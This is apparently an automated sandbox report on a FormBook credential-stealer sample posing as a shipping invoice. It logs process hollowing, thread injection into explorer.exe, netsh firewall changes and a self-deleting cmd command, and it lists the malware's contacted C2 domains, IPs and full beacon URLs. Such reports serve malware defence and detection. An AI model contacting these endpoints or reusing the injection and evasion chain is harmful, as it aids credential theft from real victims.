Source: C:\Windows\SysWOW64\cmd.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\cmd.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 9F0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
Source: explorer.exe, 00000004.00000002.914158425.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10008C6C cpuid 1_2_10008C6C
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 1_2_10008A23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10004896 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 1_2_10004896
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033A9

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: unknown Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Behavior Graph:

Behavior Graph ID: 323227
Sample: Shipping INVOICE-BL Shipment..exe
Startdate: 26/11/2020
Architecture: WINDOWS
Score: 100

Process tree (reconstructed from the behavior graph; node numbers are the graph's own):

Start (node 2)
  DNS/IP: www.mapnimbis.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 5 other signatures
  -> Shipping INVOICE-BL Shipment..exe (node 12, 54), started
       Dropped files: C:\Users\user\AppData\Local\...\Prehnite.dll, PE32; C:\Users\user\AppData\Roaming\...\vjscsvr.exe, PE32; C:\Users\user\AppData\...\rcxditui.dll, PE32; 8 other files (none is malicious)
       -> rundll32.exe (node 15), started
            Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Hijacks the control flow in another process; Maps a DLL or memory area into another process
            -> cmd.exe (node 18), started
                 Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; 3 other signatures
                 -> explorer.exe (node 21), injected
                      DNS/IP: www.wtmailer15.com 75.126.100.11, 49769, 80, SOFTLAYERUS, United States; wastie.club 95.215.210.10, 49770, 80, NEWIT-ASRU, Russian Federation; 16 other IPs or domains
                      Signatures: System process connects to network (likely due to code injection or exploit)
                      -> netsh.exe (node 25), started
                           Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                           -> cmd.exe (node 28, 1), started
                                -> conhost.exe (node 30), started

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
192.0.78.24 | unknown | United States | 2635 | AUTOMATTICUS | true
95.215.210.10 | unknown | Russian Federation | 49055 | NEWIT-ASRU | true
165.227.229.15 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
23.88.85.105 | unknown | United States | 18978 | ENZUINC-US | true
75.126.100.11 | unknown | United States | 36351 | SOFTLAYERUS | true

Contacted Domains

Name IP Active
www.wtmailer15.com 75.126.100.11 true
gettingthehelloutofca.com 34.102.136.180 true
carnesveymacr.com 192.0.78.24 true
hvcharging.com 34.102.136.180 true
mehler.photography 192.0.78.24 true
caelaabadie.com 165.227.229.15 true
thelonerangernews.com 34.102.136.180 true
wastie.club 95.215.210.10 true
www.mapnimbis.com 45.33.2.79 true
jddq888.com 23.88.85.105 true
www.caelaabadie.com unknown unknown
www.uyieoamejus2zd.com unknown unknown
www.wastie.club unknown unknown
www.mehler.photography unknown unknown
www.jddq888.com unknown unknown
www.carnesveymacr.com unknown unknown
www.thelonerangernews.com unknown unknown
www.gettingthehelloutofca.com unknown unknown
www.hvcharging.com unknown unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.jddq888.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 | true | Avira URL Cloud: safe | unknown
http://www.mehler.photography/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS | true | Avira URL Cloud: safe | unknown
http://www.carnesveymacr.com/mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 | true | Avira URL Cloud: safe | unknown
http://www.wastie.club/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly | true | Avira URL Cloud: safe | unknown
http://www.caelaabadie.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a | true | Avira URL Cloud: safe | unknown
http://www.thelonerangernews.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG | true | Avira URL Cloud: safe | unknown
http://www.gettingthehelloutofca.com/mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 | true | Avira URL Cloud: safe | unknown
http://www.wtmailer15.com/mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 | true | Avira URL Cloud: safe | unknown
http://www.hvcharging.com/mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 | true | Avira URL Cloud: safe | unknown